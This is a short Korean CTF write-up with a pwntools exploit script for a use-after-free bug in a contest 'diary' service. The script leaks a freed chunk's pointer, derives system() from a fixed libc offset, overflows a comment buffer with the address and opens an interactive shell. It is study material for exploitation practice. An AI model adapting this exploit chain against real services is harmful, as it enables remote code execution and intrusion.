
2016 holyshield diary

by St1tch


use after free 버그 문제이다.

대회 때 못풀어서, 학교 셤 끝나고 다시 풀어보았다.

빨리 review문제도 풀어야겠다.





from pwn import *

# Set to True to debug against a local copy of the binary; otherwise the
# script talks to the contest service.
local = False


def _open_target(run_locally):
    """Return the pwntools tube the rest of the script talks to.

    With *run_locally* set, start ./diary, print its PID (so a debugger can
    be attached) and pause until the user continues.  Otherwise connect to
    the contest service.
    """
    if not run_locally:
        return remote('kimtae.xyz', 9989)
    proc = process('./diary')
    print(util.proc.pidof(proc))
    pause()
    return proc


s = _open_target(local)

def command(token, *args):
    """Wait until *token* appears on the connection, then send each of *args*.

    Every argument is converted with str() before sendline(), so ints are
    accepted alongside strings.  Uses the module-level tube ``s``; if the
    expected token never arrives, recvuntil() blocks.
    """
    s.recvuntil(token)
    for value in args:
        s.sendline(str(value))

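def fast(token, *args):
    """Shorthand for command(): wait for *token*, then send each of *args* as a line.

    Written as a ``def`` instead of ``fast = lambda ...`` (PEP 8 E731) so the
    function carries its own name in tracebacks; behaviour is unchanged and
    the return value (None from command()) is passed through.
    """
    return command(token, *args)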

def solver() :
    """Drive the 'diary' service through the author's solution sequence.

    Steps, as labelled by the log calls below: log in, create two plans,
    free one, print a plan again so the freed chunk's contents come back
    (the use-after-free the post is about), turn the leaked value into the
    system() address with a fixed offset, feed pieces of that address into
    the two 'game' interactions, and finally hand the tube to the user.

    ``fast`` forwards to ``command``: wait for a prompt token, then send the
    remaining arguments one per line.  Every recvuntil() here assumes the
    service's prompts match exactly; a mismatch simply blocks.

    From a defender's view the whole chain hinges on the service still
    showing a plan after it has been freed; not reading freed records (or
    clearing the reference on free) would remove the leak this relies on.
    """
    log.success('login...')
    # Login prompt: the name sent is the literal '/bin/sh\x00'; presumably it
    # is kept in memory for the final step -- not verifiable from this script.
    fast(':', '/bin/sh\x00', '25')
    fast('>', '3')
    # The text sent here is literally the string 'rop payload'.
    fast(':', 'rop payload')

    log.success('plan create...')
    # Two plans with placeholder contents.
    fast('>', '1', '2')
    fast(':', 'stitch', '7', '7', 'stitch')
    fast('>', '2')
    fast(':', 'stitch', '7', '7', 'stitch')

    log.success('plan free...')
    # Menu option 4 with argument 100 frees a plan.
    fast('>', '4', '100')

    log.success('addr leak...')
    # Option 1 prints a plan; after the free above the service still prints
    # the freed chunk, which is where the pointer bytes come from.
    fast('>', '1')

    s.recvuntil('Plan name : ')
    # 6 bytes come back; two NULs pad them to the 8 bytes u64() expects
    # (little-endian, so the padding is the high end of the value).
    leak = s.recv(6)+'\x00\x00'

    # Fixed distance from the leaked value to system() (per the log line
    # below); the constant is tied to the libc build the service runs.
    # NOTE: this is Python 2 -- hex() of a *long* carries a trailing 'L',
    # which would break the slicing below; on 64-bit Python 2 the value
    # fits a plain int and hex() yields '0x...' only.
    target = hex(u64(leak) - 3663848)
    # Low 32 bits of the address (last 8 hex digits), packed as 4 bytes.
    addr = p32(int(target[-8:],16))
    # The first four hex digits after '0x' -- for a 12-digit address these
    # are its top 16 bits -- minus 100; reused as the game scores below.
    score = int(target[2:6], 16) - 100

    log.info('system addr = {0}'.format(target))

    log.success('game 1 go...')
    # First game with constant inputs; the comment text is arbitrary here.
    fast('>', '6', '3', '1', '100')
    s.recvuntil('.\n')
    s.sendline('3')
    s.recvuntil('comment\n')
    s.sendline('fuck!')

    log.success('game 2 go...')
    # Second game: the score-derived values go in as the numeric inputs.
    fast('>', '1', '-'+str(score))
    s.recvuntil('.\n')
    s.sendline('3')
    fast('>', str(score+100), '3')
    s.recvuntil('comment\n')
    # 84 bytes of padding followed by the 4-byte low address; how the
    # service lays out the comment buffer is not shown in this script.
    s.sendline('a'*84 + addr)

    log.success('get shell !! ')
    # Options 3 -> 1 -> 1: the step the author labels 'get shell'.
    fast('>', '3', '1', '1')

    # Hand the connection to the user.
    s.interactive()

if __name__ == "__main__":
    # Run the full interaction only when executed directly, not on import.
    solver()



